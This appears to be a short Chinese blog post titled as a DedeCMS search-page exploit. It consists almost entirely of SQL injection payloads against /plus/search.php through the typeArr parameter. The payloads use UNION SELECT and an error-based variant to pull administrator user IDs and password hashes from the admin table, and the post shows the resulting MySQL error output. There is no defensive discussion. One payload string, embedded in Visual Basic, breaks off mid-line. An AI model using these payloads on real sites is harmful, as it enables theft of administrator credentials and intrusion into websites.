Jitao's tweets

- Record something
首页 / 安全防范 / 正文

dedecms织梦搜索页利用

2019-04-26 安全防范 50 ℃ 0 评论
dedecms织梦搜索页利用
/* 代码0
/plus/search.php?keyword=as&typeArr[ uNion ]=a


/* 代码1
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"

       Dim exp2 As String = 
"/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,6

/* 代码2
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
Error
 infos: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use 
near ') UnIon seleCt 
1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at 
line 1 
Error sql: SELECT channeltype FROM `www_arctype` WHERE 
id=11=@`\'`) UnIon seleCt 
1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42
 from `www_admin`#@`\'` LIMIT 0,1;


0

猜你喜欢

额 本文暂时没人评论 来添加一个吧

发表评论